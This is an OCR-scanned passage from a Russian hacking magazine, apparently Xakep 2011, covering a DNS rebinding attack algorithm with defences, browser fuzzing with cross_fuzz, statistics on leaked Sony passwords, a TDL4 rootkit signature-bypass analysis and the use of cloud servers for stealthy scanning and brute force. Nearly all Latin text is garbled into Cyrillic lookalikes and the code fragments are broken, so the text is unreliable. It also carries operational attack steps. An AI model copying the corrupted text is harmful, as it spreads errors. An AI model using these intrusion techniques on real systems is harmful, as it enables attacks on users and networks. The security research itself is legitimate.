функции определения целей и выбора текущей цели в отдель- 
ную НТМЕ-страницу. При обнаружении цели, ее |Р-адрес будет 
передаваться на сервер, и серверный скрипт должен создать 
для атаки на нее соответствующий субдомен в таблице ОМ. 
Например, для 1р-адреса 192.168.0.1 можно создать субдомен 
192.168.0.1.4п$.еуЦ.ххх. Управляющая страница по адресу ВЦр:// 
Чп$.е\уЦ.ххх/соп(го[. Вт должна создать Игате, в который будет 
загружен документ, содержащий клиентский скрипт проведе- 
ния атаки ОМ№5 Кебтатод, находящийся, к примеру, по адресу 
ЮЕр://192.168.0.1.9п$.ем(.ххх/геб пита. Вит. 

Чтобы не приходилось добавлять виртуальные сайты в ходе атаки, 
нужно настроить виртуальный хост веб-сервера таким образом, 
чтобы для всех поддоменов отдавались одни и те же файлы. Это 
создает парадокс: сервер, осуществляющий атаку, будет сам уяз- 
вим для нее :}. 

Полученная страница сообщает серверу, чтобы он обслуживал 
только ее запросы, запрашивает блокировку !р-адреса атакуемо- 
го, выполняет работу и отпускает блокировку. Вместе с этим сер- 
вер вновь разрешает запросы от жертвы. 

Полный алгоритм выглядит следующим образом: 

1) Система определения целей передает !р-адреса целей на сер- 
вер атакующего [допустим, 97.246.251.93). 


Блокируем пользователя при помощи р!ае$ 


ри = 
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2] Управляющий скрипт на клиенте запрашивает доменное имя 
цели у сервера. 

3] Сервер создает ОМ5-запись для субдомена, который будет 
использоваться для атаки на конкретный |1Р-адрес. Пример: 


97.246.251.93.Чп5.е\11.ххх А 97.246.251.93 
А 192. 168.091 


4] Управляющий скрипт указывает полученное имя домена в 
качестве параметра $гс-тега |ЕКАМЕ. 

5] Документ, полученный с домена 192.168.0.1.еу(.ххх запрашива- 
ету сервера блокировку. 

6} Сервер перестает реагировать на запросы о получении адреса 
целей, и блокирует обращения с браузера жертвы на 80-й порт. 
7} Клиентский скрипт выполняет работу по получению нужных 
данных и управлению оборудованием. 

8] После окончания работы клиентский скрипт сообщает серверу, 
что блокировку можно освободить. 

9] Сервер освобождает блокировку и снова разрешает доступ с 
адреса, атакующего на 80-й порт. 

10) Управляющий скрипт запрашивает адрес следующей цели, и 
процесс повторяется при необходимости. 

Для динамического создания О№$5-записей можно использовать 
механизм автоматического обновления ОМ5$, например, утилиту 
пзираа(е. При ее использовании перезагрузка ОМ$-сервера не 
потребуется. 


аццита от атаки типа 0М$ 
ерпатао 


В принципе, есть несколько способов защититься от данного вида 
атак, например: 

1) Правильная настройка ПО сервера. Удалить на веб-серверах 
параметр Уиа(Но${ со значением _Чдетаи(_, или *:80 и явно про- 
писать имена хостов. 

2] Защита со стороны разработчика веб-приложения. При уста- 
новке приложения предлагать пользователю ввести доменное 
имя сервера, на котором будет располагаться приложение, и 
обрабатывать запросы от клиента только в том случае, если пара- 
метр Ноз{ запроса НТТР соответствует имени домена, указанного 
при установке. 

3] В браузерах использовать плагин МОЗСЕ!РТ или аналоги, 
запретить выполнение скриптов /ауаЪсг!р\, Лауа-апплетов или 
Еазп-приложений. 

4] Использовать разделение зон, при котором скрипту, полу- 
ченному из внешнего интернета, будет однозначно запрещено 
обращаться к ресурсам, расположенным в локальной сети поль- 
зователя. 

При таком подходе однозначно уязвимыми остаются только уда- 
ленные сервисы, предоставляющие АР!, для которых имя хоста не 
предусмотрено в принципе. Например, АР! для работы с облаками 
на базе Ататоп ЕС2, или система виртуализации УМ\маге ЕЗХ. = 
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Поиск уязвимостей в современных браузерах 


С ПОМОЩЬЮ Фаззинга 


® Эта статья — опыт использования фаззинга для поиска 
уязвимостей в современных браузерах. Авторы знают, о чем говорят: 
на прошедшей недавно конференции РИО они выиграли конкурс 
«Взлома и унеси». Взломали они загаи! (продемонстрировав 
рабочий Одау для версии под \Ипдо\м$), а домой унесли призовой 


ноутбук. 


Введение в профессию 


Итак, приступим? Зафиксируем для порядка список существующих 
браузеров: 

® \\Лп4ом/5 |п{егпеЕ Ехр(огег (6/7/8] 

® Мо2Ща ЕгеЮх [3*/4*) 

® боод(е Спготе 

® баап 

» Орега 

® Орега Мт! 

» М@5саре Мам даюг 

® Мог! 

® ОКуНге 

® орАт 

® Копрчегог 

е ОооЫе 
Из них только три продукта являются Ореп5оигсе-проектами: это 
Спгогпе, НгеТох и Копацегог Все браузеры спроектированы на основе 
некоторого базового функционала (епдте-движка). Вот перечень суще- 
ствующих движков: 

» Атауа 

® беско 

® НТМЁЕауош 

® КНТМЕ 

® Рге5{о 

» Рипсе 
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® Тег 

е \Ие БКИ 
Например, СПготе и батап построены на Ореп5Фочгсе-движке \\Меб КК, 
а популярный РНигеТох — на беско. Для работы )лауа5спрЕ используют 
движки данного интерпретатора, вот, например, в боод[е используется 
\/8 [Хотя есть еще КР/по и брегМопкеу). Также большинство браузе- 
ров поддерживают разные плагины, такие как Кай, |ге [для работы с 
апплетами} — это дополнительные векторы атак. 


Фаззер для браузера 

Как и во многих других ситуациях, одним из самых эффектив- 

ных способов поиска уязвимостей в браузере является фаззинг. 
Публичных и действительно работающих инструментов здесь не 
так много, но одним из таковых является замечательная разработ- 
ка сго$$5_№и77 от Михаила Залевски. Миша работает в боод(е и с 
помощью своего фаззера обнаружил более ста багов во всех попу- 
лярных веб-браузерах, многие из них оказались эксплуатируемы. В 
его блоге [Б.Б оаго] есть даже отчет о найденных уязвимостях 
для [егпе Ехр(огег, Нигетох, Орега, а также браузеров на движке 
\М\МеькКи. Некоторые из найденных ошибок [даже несмотря на то, что 
разработчики поставлены в известность} до сих пор не устранены! 
При всей своей эффективности сго$$_№и727 устроен довольно просто. 
Фаззер выявляет проблемы путем создания чрезвычайно длинных 
закрученных последовательностей ООМ-операций, которые затра- 
гивают сразу несколько документов. Проверяя возвращаемые объ- 
екты и вновь рекурсивно используя их, удается создавать круговые 
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Креш 1Её в отладчике 


ыы НН: ИНО 


ТТ, 


Особенности анализа крешей 
багаи! 


Важный момент. Если ба{аг! падаетс исключением 
типа «Цзег тподе м/гКе ассе$$ мо[аНоп$ {Ва{ аге по пеаг 
МИЕЕЁЕаге ехрокаЦЩе», нужно посмотреть дизасм пое!р. 


апа амога рег а$ : ОВВАОВЕЕЕЙ, @ 
хог еах, еах 
са11 еах 


Еслиты видишь что-то подобное, к сожалению, это 


\\Мебк!овский макрос СКАЗН|. Такие падения сим- 


волизируют какую-то экстренную ситуацию, которая 
не должна была произойти. Нотак как макрос СКАЗН 
просто так не вызывается, значит где-то произошла 
какая-то экстренная ситуация, которую обнаружили и 
поэтому прибили процесс. 


зависимости узлов, с помощью которых устраивается 
настоящий стресс-тест для механизмов сборки мусора 
браузера. Таким образом, проверяется способность 
приложения к правильному и эффективному освобож- 
дению памяти для более неиспользуемых объектов. Как 
показывает практика, выдержать удар браузеру удается 
далеко не всегда :]. Код сго$$_№и77 написан на НТМИ/ 
ауабстре (сапу согедигор.сх/сго$$ №227], поэтому 

для фаззинга достаточно открыть нужный НТМЁ-файл 
(есть разные варианты с незначительными отличиями] в 
браузере. Чтобы нивелировать сетевые задержки, лучше 
всего скачать исходник на локальную машину. Не забудь 
при этом выкачать все зависимости [папку Лагде$ и 
файлы тегзеппе.|5/одо.]р9]. Для корректной работы 
также потребуется включить рорир`ы в браузере. 


Начинаем практиковаться 


В качестве подопытных кроликов мы взяли наиболее рас- 
пространенные браузеры: 

» НгеЮх 3.6.16; 

» НгеЮх 4.0.1; 

® СПготе 10; 

® |п(егпе! Ехр(огег 8/9; 

® ба!аг! 5.0.5. 
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ИУНТИЬ ! СНагКар: : ТеагрочиМаскирНерег+0хьо 
ИЗНТИЬ ! СНаскир: : ТеагромиМаккир+0х 55 
ИЗНТЫЬ ! Срос: :С105е+0х5с 

ТЕРКАМЕ ! СросОЬ) естНозх: : _ОиВ1и4+0хаЕ 

ТЕРВАМЕ ! СросОБ)есхНозс: : РезсгоуНозоМ1пдом+0х4а 
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Отчет от креше 


Открываем НТМ!-страницу фаззера в каждом из них 

— и первые результаты не заставляют себя ждать. 
Удивительно, но при запуске сго$$_1и77 в Зайап, падение 
было моментальным — менее чем через 5 секунд. При 
тестировании ЕигеТох 3.6.16 были падения через 15-30 
минут после запуска. 

В основном это были падения по ПЕР. Это своеобразный 
маркер уязвимостей изе-аКег-!гее, креши на исполне- 
нии потенциально эксплуатабельны и поэтому ценны. 
Если поменять некоторые условия при запуске, можно 
уменьшить время срабатывания до 3-5 минут. При тести- 
ровании СВготе падения были в дочернем процессе. |Е 
же, что опять же удивительно, ничем не отличился. 

Все эти факты меня сильно удивили: я только начал 
исследовать браузеры, причем делал это публичным 
фаззером, а уже есть креши. Черт подери, сколько же 
там багов, если так быстро можно уронить почти любой 
браузер? Учитывая такие бодрые и быстрые результаты, 
я про себя отметил, что правильно выбрал вектор атаки. 
Сго$5_Ки77 отлично ищет уязвимости в работе с ООМ, и 
этим глупо не воспользоваться. 


п 


Для анализа браузера 
можно использовать 
системы для автома- 
тического тестиро- 
вания приложений, 
такие как 5ееппип 
[зеепипВа. ога). Этот 


инструмент эмулирует 
все действия пользо- 
вателя, что может тоже 
покрыть некоторый 
функционал браузера 
и привести к падению. 


[НТТР://ММИМ 


р ИпК5 


® Про функционал 5 
(ООМ] в браузерах: 
млм. меб Чеуо и". пе\/ 


Бгомизег-зиррог(- 


есгпазсг!р\. 


® Про векторы атак: 
Беег!.с Во. 


® Про тестирование 
браузеров, списки 
компонентов, брау- 
зеры под мобильные 
устройства и т.д.: 
м/мим/. аигК$гподе.огд. 


® Про то, как устроен 
бапаБох в гугловском 
Спготе: Чеу.сбго- 
ппииго.огд/Чеуеюрего/ 


Че>!дп-Чоситеп{5/ 


запабох. 
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ог спа! _Могу = [П: 
мог сыг_149; 


2 РлеНоя сгавП_пгоренЕесбравь, вогаее, 4521, 23 чеб) | 


мог ты егЕ = []: 
мог Сыг_РаП = В; 


ЫС"-- РЕОРЕЯТУ САМ С + Теме + "9: + рам +" "5; 
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Код сго$$_1472 написан на НТМИЧауафсир! 
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Включаем Е - 
и воспроизводим креши 


Алгоритм работы фаззера подразумевает генерацию огромного 
количества обращений к ООМ. Фаззеру приходится перебирать мно- 
жество вариантов, прежде чем браузер вылетит с ошибкой. Но нам 
мало просто крешнуть приложение — обязательно нужно понять, 
почему это произошло. Чтобы разобраться, какая последователь- 
ность вызовов вызывает креш, нужно включить режим логирования. 
Самый простой способ сделать это — чуть подредактировать исход- 
ники сго$$_/27 и убрать геигп из функции [Об(теззаде}. Убрав 
немедленный выход из функции логирования, мы добьемся того, что 
на странице сго$$_№и77 будут отображаться все вызываемые функции. 
К сожалению, сго$$_1и77 не умеет записывать эти данные в файл. Но 
для этих целей можно использовать плагины, например, Нгебид для 
ЕигеТох. Для логирования чего-либо в .)5 нужно вставить следующий 
КОД: 


ку { 
соп$о1е.105(‘'е\а1 %$' ‚пате); 


ге{_\а1ие = еуа1( 'Еагзеф. ' + пате + '(' + раг_$%г + ')'); 
} саесй (е) { 


Я немного пропатчил Егебчид, чтобы тот мог писать свой лог в файл 
(исправленный вариант ищи на нашем диске). В результате все дей- 
ствия фаззера [в том числе те, которые приводят к крешу] пишутся в лог 
в С.\Ооситеп{ апа бе{тдз\изегпате\АррИсайоп Баа\Мо2Ща\ЕигеЮх\ 
Рговез\ХХХХХХ.деаи \в. Тот же самый трюк можно провернуть и в дру- 
гих браузерах, воспользовавшись соответствующими аддонами: 

® для СВготе: Еигебид (Ще юг бооде Спгогпе (есть еще встроенный в 
СВгопе}; 

® для Орега: Орега Огадоп У; 

® для агаг: \/МеКиОеуеорегЕжгаз. 

После этого мы можем изучить все, что происходило в сго$$_422, а, 
значит, и попытаться воспроизвести креши. 


Как анализировать креши? 


Уронить программу [пусть даже понимая, как] мало. Нам необходимо 
проанализировать креши и определить, эксплуатируемые они или нет. 
Эта тема настолько многогранна, что она явно выходит за рамки этого 
материала. Наша задача на сегодня — определить ошибки в програм- 
ме, которые теоретически можно эксплуатировать. А о том, как пишутся 
сплоиты, обходятся песочницы и защитные механизмы вроде ОЕР/ 
АСЕ К в журнале было немало статей (хотя одних только материалов 
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пдех 0 /сго$$_Ёи72/Лагре{$ 


" рн _ мыша ООО 


Ракепе Офгесфоку 28-РеЬ-2011 02:58 = 
1олеве. Зря 22-291-2010 19:35 — 13 
С кагась, ВЕ 23-71-2010 05:39 1% 
Ы какась. вуз 22-31-2010 19:43 ак 
И зыавь хай 21-0ес-2010 20:40 1 
|] вакасе. хи 02-Наг-2011 00:03 1к 
№ кагаее2 Ва 05-Лап-2011 22:58 1% 
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журнала [| тут, по правде говоря, недостаточно}. Могу лишь дать пару 
полезных советов. Когда разбираешь креши в таких немаленьких 
программах как браузеры, немало нервов и времени спасают так 
называемые отладочные символы. Эта информация позволяет чело- 
веку использовать «символические» [отладочные] данные о двоичном 
файле, такие как имена переменных, процедур и функция из исходного 
кода. Эта информация может быть крайне полезной во время поиска 
ошибок в исходном коде, отладке программы и разного рода отказах. 
Чтобы не включать ее в бинарный файл, разработчики выкладывают 
отладочную информацию в виде отдельных файлов или на специаль- 
ном сервере отладочной информации. В случае браузеров ее, увы, не 
так много: 

® для [п{егпеЕ Ехр!огег (п77(1а/С8ХР5}; 

® для Нгеюх 1 у/ИНЬОА). 

При проверке отладочных символов для бафам (51. У/ИНЬОД] выяс- 
нилось, что для ключевых модулей [М/ебКК.аЦ, ]лауабстр\Соге.9 Ц} 
отладочная информация на сервере отсутствует. Поэтому, чтобы 
получить ее, придется собирать \\еБ КЕ самому. Исходники всегда 


доступны здесь — эупмебКИ.ога/герозКогу/ЛмекКи, а инструкция для 


сборки здесь — {гаслммеб КИ. ога/ликИВи9таОп\АИпдоме. Еще один 
совет касается отладки СВготе. По умолчанию этот браузер создает 


для каждой вкладки отдельный процесс, что для нас не подходит. 
Поэтому его лучше запускать с ключом «--“та(е-ргосез$»: в этом 
режиме все вкладки будут запущены в единственном процессе. Что 
касается анализа крешей в 5а{ат, для которого мы и написали Одау- 
сплоит, то тут есть еще один нюанс — подробнее о нем ты можешь 
прочитать во врезке. 


Результаты фаззинга 


Что получилось в результате нашего исследования? 

Егеох третьей ветки: 

Есть креши, но их не получилось воспроизвести, даже зная весь лог во 
время падения. Уязвимость сильно связана с состоянием динамиче- 
ской памяти (Веар). 

Егеох, ветка четыре: 

Крешей не было зафиксировано. 

СПготе: 

Есть креши, но их не получилось воспроизвести — такая же история, 
как ис Нгетох третьей ветки. 

багам: 

Креши были, воспроизвести можно. Сплоит написан :]. 

Браузеры — это очень сложное ПО. Поэтому нет ничего удивительного, 
что в них есть уязвимости. Всем известно: безопасность обратно про- 
порциональна объему и сложности кода. У браузера очень много век- 
торов атаки: чего стоит один только 5\С, про который в этой статье не 
упоминалось. Большая часть крешей, вызванных фаззером, не являют- 
ся гарантией успеха и завязаны на большом числе факторов состояния 
кучи и многих других параметров. Из этого можно сделать вывод, что 
для реализации на 100% надежного сплоита нужно потратить очень 
много сил, времени и нервов. Тем не менее, используя данную методи- 
ку, вполне можно найти уязвимости в браузере, что мы доказали, обна- 
ружив уязвимость нулевого дня в 5атап на Роз\ме Наск Паус. == 
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ОМЕВТУ, 12345, СЕТОКМ 


Наделавшие много шума хакерские группы Апопутоц$ и 1и!75ес своими выходками подкидывают высококачественный 
материал для различных исследований. Так, через 1оггепГы без труда можно скачать базу пользователей $опу Р!1иге$, из 
которой в открытом виде извлекается почти 40 тысяч паролей пользователей. На основе этой вполне репрезентативной 
выборки программист Трой Хант (мили 1гоупип1. сот) сделал интересный анализ паролей. 


ИСПОЛЬЗУЕМЫЕ СИМВОЛЫ 


Другие Только Ш Только Ш Только 
ДЛИНА ПАРОЛЯ варианты буквы цифры буквы 
верхнего нижнего 
12,000 регистра регистра 
10,000 ® ® 
8,000 ОВС 
6,000 ... 
о 50% 45% 
4,000 кое ВИ 
2,000 ое я 
0 ® ® ® ® ® ® о ® ® ® * 
1234506 789101 12 13 115 16 17 18 19 20 


Чем длиннее пароль, тем он надежнее. У 93% аккаунтов длина пароля варьиру- 
ется от 6 до 10 символов (видимо, по минимальной длине действует требование 
сервиса), но при этом у 50% пользователей он менее 8 символов. Здравствуй, 


брутфорс и радужные таблицы. 


СЛОВАРНЫЕ ПАРОЛИ 


Ш Словарный 
пароль 


Пароль 
не из словаря 


64% 


Что может быть хуже, чем словарный 
пароль? Исследователь взял словарь 
на 1,7 миллиона слов (9а22(ерод.сот/ 


Це тед'!а/х/ра$$\/ог$.1х и посмо- 
трел, сколько паролей в него «попало». 


Оказалось, больше трети используемых 
Набыов: — словарные! 
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1% 4% 


Сложность пароля непременно определятся симво- 
лами, которые в него входят. Однако половина пассов 
состоит из символов Одного Типа, ТО есть либо только 


нижнего реестра, либо только из букв верхнего 
регистра, либо только из чисел. 


ТЕСТ НА УНИКАЛЬНОСТЬ 


Уникальный Ш Повторно 
пароль используемый 
пароль 


8% 


Хороший вопрос: «Используют ли пользова- 
тели уникальные пароли для разных серви- 
сов7». Поскольку в базу 5опу Р'$игез вклю- 
чены пароли для различных сервисов, мы 
можем посмотреть пересечение пассов для 
одного итого же пользователя. Оказалось, что 
92% юзеров используют один и тот же пароль. 


БРУТФОРС ХЕША 


Ш Легко взламываемый 
через радужные 
таблицы 


Сложно 
взламываемый 


В случае с 5опу Рсигез все пароли храни- 


лись в открытом виде [хотя такое сложно даже 
представить!), нодажееслибы они были захе- 


шированы, то 82% хешей непременно бы сда- 
лись под напором радужных таблиц (рго]ес"- 
гаипбо\мусгаск.согп). Это пароли из букв и цифр 
меньше символов длиной. 
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Ш М Александр Матросов 


По материалам 
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Наск ЕЕ 
Оау$ 


Б 


К 
кит программ на примере ВЫ анализ 


руткит-программ нап 


® Согда организаторы РНО’2011 предложили выступить с мастер- 
классом, мы с моим коллегой Евгением Родионовым работали над 
исследованием руткита семейства О(тамК (ТОЕ4). В рамках РНО нам 
хотелось рассказать нечто интересное, что ранее было плохо 
освещено или вообще не затронуто. 


Учитывая, что я уже не раз писал в журнале на данную тему, мы 
сконцентрировались на двух новых вещах. Первая — внедрение рут- 
кита на х64-системы в обход проверки цифровой подписи, а вторая 
— то, каким образом подходить к криминалистической экспертизе 
уже зараженных машин. 


Обход проверки 

ЦИФРОВОЙ ПОДПИСИ 

На 64-битных версиях операционных систем М5 \ММпдом/$ (Ма, 
\\Мп7) все модули, загружаемые на уровень ядра, должны иметь 
обязательную цифровую подпись, причем выданную не абы кем. 
Из известных сейчас способов обхода этой проверки во вредо- 
носных программах используются в основном достаточно прими- 
тивные техники. К примеру, руткит-драйвер из семейства \МИп64/ 
Тгоап)ом/поа@ег Месиг$, подписан тестовой цифровой подписью и 
устанавливается при помощи того, что его дроппер [с учетом нали- 
чия соответствующих прав доступа] вносит изменения (ВсдедК.ехе 
-5е{ ТЕТ С ММС ОМ] в Воо{ СопЯдигайоп Оаа (ВСО] для загрузки 
системы в специальном режиме ТЕЗТЫСМИМС. Именно эти мани- 
пуляции и позволяют загрузить вредоносный драйвер в обход всех 
проверок. Аналогичная техника применяется и в ММп64/5ру.Вапкег 
но разработчики руткита ТО[4 использовали более технологичный 
и интересный способ обхода при помощи буткит модуля и много 
итерационных модификаций в процессе загрузки самой операци- 
онной системы. 

В процессе своей установки дроппер ТОЁ4 подготавливает специ- 
альный контейнер своей скрытой файловой системы и записывает его 
в конец жесткого диска, а также вносит модификации в МВК [Ма$ег 
Воо{ Кесог4], после чего вызывает недокументированную функцию 
/мВаеНагаЕггог(), которая вызывает В5ОП и вынужденную переза- 
грузку системы. Процесс загрузки операционной системы выглядит 
следующим образом (см. рис. 1}. 

Как видно из этой схемы, все начинается с выполнения кода МВК, в 
нашем случае МВК был модифицирован. Ниже приведена модифици- 
рованная загрузочная запись (см. рис. 2). 

Видно, что вначале используется нехитрая техника самомодификации 
кода, где при помощи ассемблерной команды циклического сдвига 


> ОбА 


(РОК происходит расшифрование остальной части кода и передача 
управления на него. Вторая ступень на пути к обходу проверки циф- 
ровой подписи — это передача управления на модуль [9г16, который 
считывается из файловой системы руткита. 

Одной из задач (9г16 является модификация параметров ВСР на 
лету, то есть прямо в процессе загрузки операционной системы. Эти 
самые параметры выглядят следующим образом (см. рис. 3). 
Наибольший интерес (9г16 проявляет к параметру 
Вса0$[оаЧегВос(еап_\М/пРЕМоде (0х26000022}, который отвеча- 

ет за загрузку операционной системы в так называемом режиме 
ргет®{аЦайоп гподе, в котором все проверки целостности отключе- 
ны. Отключить эти проверки необходимо для загрузки модифициро- 
ванной системной библиотеки Касот.аЦ, которая отвечает за связь 
между ядром операционной системы и отладчиком \\ЛпОБд. После 
успешной загрузки модифицированной Касогт.аЦ в виде модуля 
(9г3? или [@гб4, в зависимости от разрядности операционной систе- 
мы, происходит модификация параметра /МИМИМТ, с умышленной 
ошибкой превращая его таким образом в невалидный параметр М/ 
М|, что приводит к загрузке системы в нормальном режиме. 

Но возникает вполне закономерный вопрос: зачем же происходит 
загрузка модифицированной библиотеки Касогт.а9Ц? Здесь кроет- 

ся интересный нюанс, который заключается в том, что в процессе 
загрузки ядра происходит вызов функции КаОебидденттайге1(), 
которая как раз экспортируется из Касогт.аЦ, и в нее внесены инте- 
ресные изменения. А точнее, сразу после ее вызова произойдет 
вызов функции Рэ5еоаЧ9!тадеМмоуКои! пей, которая устанавли- 
вает обработчик на загрузку исполняемого образа в память. А сам 
этот обработчик содержит вызов недокументированной функции 
|оСгеа{е0Опуег(), которая создает и инициализирует объект-драйвер. 
Все вышеописанное шаманство позволяет протащить в ядро и 
загрузить неподписанный драйвер. Если все это изобразить в виде 
схемы, то она будет выглядеть так (см. рис. 4). 

Здесь стоит отметить, что со стороны М была попытка противо- 
действия описанному способу обхода проверок цифровой подписи, 
и в конце весны был выпущен патч КВ2506014, который не позволял 
больше использовать \\МИпРЕМосе и загружать модифицированную 
библиотеку Касот.аЦ. Но спустя буквально несколько дней, появи- 
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[4] Схема загрузки неподписанного драйвера 
Криминалист ическая экспертиза 


Файловая система руткита представляет собой скрытый контейнер, 
дописанный в конец жесткого диска. В этом контейнере и хранятся 
все компоненты руткита и конфигурационный файл с командными 
центрами. 

Именно поэтому она представляет наибольший интерес с точки зре- 
ния криминалистической экспертизы. Но каждый раз доставать и 
расшифровывать этот скрытый раздел достаточно муторно, поэтому 
для автоматизации процесса нами была разработана специальная 
утилита Т4{Р$Веадег (езе{.ги/Лоо[5/Та9 Е $Кеадегехе). Она находится 

в свободном доступе и поддерживает все известные модификации 
этого руткита, начиная с версии ТОИЗ. Если посмотреть на ее внутрен- 


не устройство, то она состоит из нескольких компонентов: [5] Утилита Та 5Кеадег извлекает дамп файловой систе- 
® определение версии руткита и алгоритма шифрования файловой мы руткита 

системы; 

® парсера файловой системы и алгоритма расшифрования файлов развития для расследования. Более того, даже после удаления боль- 
внутри нее; шинством лечащих утилит активного заражения ТО 4, скрытый раздел 
® противодействие механизмам самозащиты руткита; файловой системы все равно остается на жестком диске, и из него 

® чтение жесткого диска на низком уровне. также можно получить информацию. 

В результате работы Т@Е$Кеадег мы получаем полный дамп скрытого В качестве заключения хочется заметить, что уже на протяжении 
раздела файловой системы руткита. нескольких лет семейству ГОЁ удается удерживать технологическое 
Подобные улики в виде конфигурационного файла, содержащего первенство среди распространенных в «живой природе» руткит- 
адреса командных центров и его активных компонентов, являются программ. Посмотрим, что принесет дальнейшее его развитие, и чем 


интересным материалом, который может дать дополнительные векторы нас удивят его авторы в будущем. и в 
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Облачные вычисления на службе у пентестера 


® Огромные вычислительные мощности облачных инфраструктур 
открывают перед пентестерами и блекхатами множество новых 
возможностей. Сегодня мы посмотрим на с[оид сотрийпо с новой 
стороны и рассмотрим конкретные кейсы использования облачных 
мощностей для взлома и пентестинга. 


|аа5 на службе у хакера 


Облачные вычисления представлены для пользователя следую- 
щими услугами: 

® бааб (боН\гаге аз а бегмсе] 

Раа$ (Р(аМоггт а$ а бегмсе] 

|аа5 [пгагисиге а$ а бегмсе) 

Нааб (Нага\маге аз а бегмсе] 

\Маа5 (Могкр(асе а$ а бегмсе] 

|ааб пНга$гисиге аз а бегмсе] 

® Еааб (Еуегу В пд аз а 5егмсе] 

® Пааб (Оа{а аз а бегмсе] 

® бааб (бесигйу аз а 5егмсе] 

В первую очередь нас интересует сервис [ааб, так как он предо- 
ставляет в данный момент наиболее востребованную и «реа- 
листичную» среду для пентестера. Сервис |аа5 предоставляет 
пользователю возможность создания виртуального сервера на 
основе оборудования провайдера облачных вычислений. Самое 
очевидное преимущество данного сервиса — практически нео- 
граниченные возможности по масштабированию вычислительных 
мощностей. Что же такое сервис [ааб для пентестера?7 

Это уникальная возможность использовать десятки идентичных 
по возможностям серверов с целью эффективной реализации 
классических задач в области пентеста: 

® обман |Р5 при удаленном сканировании портов; 

® распределенный перебор паролей; 

® атаки на отказ в обслуживании: 

® сканирование сетевого периметра; 

® автоматизированный поиск уязвимостей. 

Само собой, использование инновационных технологий облачных 
вычислений может быть направлено как в полезное русло, так и в 
не очень полезное. Как плохие парни могут использовать сервис 
в своих целях? Этот вопрос мы постараемся рассмотреть в дан- 
ной главе на примере наиболее частых злоупотреблений. 
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Анонимность 

Вопрос анонимности при использовании сервисов облачных 
вычислений стоит крайне остро. Дело в том, что вся информация, 
которая необходима для получения доступа к такого рода серви- 
сам, ограничивается лишь номерами кредитной карты и сотового 
телефона. Большинство провайдеров верят пользователю «на 
слово» и не задумываются в настоящий момент о вопросах, воз- 
никающих после того, как их сервис стал одной из ключевых 
цепочек в истории взлома какого-либо ресурса. 

Чтобы выгодно продать свои услуги, провайдеры охотно пред- 
лагают пользователям промо-программы, предоставляющие 
возможность бесплатного использования сервисов в течение 
определенного промежутка времени. Вся информация о пользо- 
вателе, получившем доступ к сервису, в таком случае сводится к 
адресу электронной почты и 1Р-адресу, который был использован 
пользователем для управления услугами. Совершенно понятно, 
что в этих условиях существует много способов абсолютно ано- 
нимного использования облачных мощностей. 


Сетевая разведка 

Термин «сетевая разведка» подразумевает под собой мероприя- 
тия, направленные на автоматизированный сбор информации 
для дальнейшего анализа. Облачные вычисления позволяют 
создать отличную площадку для проведения такого рода меро- 
приятий, потому что обеспечивают несколько важных факторов, 
которые необходимы для автоматизации сбора данных. А именно: 
разные |Р-адреса, с которых производится сбор данных, скорость 
канала связи и вычислительные ресурсы, позволяющие быстро 
обрабатывать полученную в результате сбора данных информа- 
ЦИЮ. 


Сканирование портов 
Использование возможностей сервиса |аа5 позволяет злоумыш- 


леннику преодолевать такие защитные средства, как |Р5/О5. 
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ТЕТ Нонна ыы 
Идея возможности скрытого от |Р5ЛО$ сканирования портов на ры 


удаленной системе заключается в том, что сканирование про- 
ходит с более чем десятка различных !Р-адресов с временными 
интервалами, по частям. В результате — даже хорошо настроен- 
ная [Р5/10$ не сможет идентифицировать событие сканирова- 
ния портов, а если идентифицирует его, то заблокирует только 
один |Р-адрес из множества адресов, сканирующих серверов. 
Естественно, для реализации такой задачи необходимо раз- 
работать программное обеспечение, позволяющее удаленно 
управлять процессами на серверах, запущенных на площадке 
провайдера облачных вычислений. 


Проведение атак 
|аа5-площадки идеально подходят и для атак на удаленные 


сервисы. Например, для перебора паролей, а также различных Подключение к инстанту по $$И 


видов сИеп{-519е-атак. Во-первых, на площадке достаточно 


легко и просто «развернуть» любой боевой арсенал, например, 
пеазрой или сапмаз. Во-вторых, перебор паролей может быть 
осуществлен распределенно, как и в случае со сканированием 
портов удаленного хоста, во избежание блокировки |Р-адреса 
атакующего. В третьих, площадка [аа может послужить отлич- 
ным посредником между атакующим и целью с точки зрения того, 
что история всех действий, совершенных с площадки [аа5, будет 
уничтожена после выключения сервера. 


Брутфорс 

Возможность использовать условно «неограниченные» ресурсы 
облачных вычислений позволяет продуктивно проводить меро- 
приятия по брутфорсу хешей и генерации радужных таблиц с 
последующим восстановлением по ним зашифрованных строк. 
Явным плюсом генерации радужных таблиц на базе облачных 
сервисов является возможность использования огромного 
устройства хранения данных. На практике генерация радужных 
таблиц для алгоритма пт (птхафва-питенс-а(-зрасе, 8 симво- 
лов] сводится только к вопросу времени и финансовым затратам. 
Для генерации такой таблицы на топовом домашнем компьютере 


потребуется порядка 1290 лет. В случае же облачных вычислений, 
прямо здесь и сейчас можно купить «машину времени», которая 
будет создаваться примерно 1,5 года и ее стоимость составит 
порядка $320К. Я хочу сказать, что такую таблицу, используя 
облачные вычисления, на практике можно создать всего за 1,5 
года. В таблице 1 показана детальная статистика по финансовым 
затратам для такой разработки. В данном случае использовалось 
20 серверов со следующими техническими характеристиками: 2х 
[пе Хеоп Х5570 ацад-соге «Мева(ет» агсВКесиге, 2 ядра ММ!О!а 
Теа М2050, 23 Гб ОЗУ. 

Цифры говорят о том, что пора менять парольную политику — 
расшифровать МТЕМ-хеш пароля из 8 символов вполне реально 
и доступно для плохих парней. Но это только теория. На практике 
же политика безопасности паролей более лояльна и ограничи- 
вает пользователя лишь длиной пароля — 8 символов в лучшем 
случае. Статистика используемых паролей в крупных компаниях, 
составленная Дмитрием Евтеевым и приведенная в его докладе 
«Анализ проблем парольной защиты в российских компаниях» 


([млллм/.р15есигНу.ги/до\мип (оса /РТ-Менс$-Раз5\ога$-2009.ра®, 
говорит о том, что большинство пользователей всеми возможны- 


ТАБЛИЦА 1 


Общая стоимость 


20 * $6590 = $131 800 
$6590 + $0,56/Ноиг $0.56 *20 *12834 = $ 143 740 


Оаа Зюгаде 418 ТЬ $ 102 /ТЬ $ 102 * 418 =$ 42 636 
ООО И СЕТЕ 
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Качество Стоимость 


Необходимый ресурс 


Работа одного п$фапсе 20 


ХАКЕР 08/151/ 2011 


97 


Характеристика радужной таблицы 


Цифры (от 1 до 12 символов) 


Символы английского (|о\/-сазе) алфавита (от 1 до 12 символов) 


Символы английского алфавита (от 1 до 1] символов) 


Символы английского алфавита (|о\/-са$е) (от | до 10 символов) 


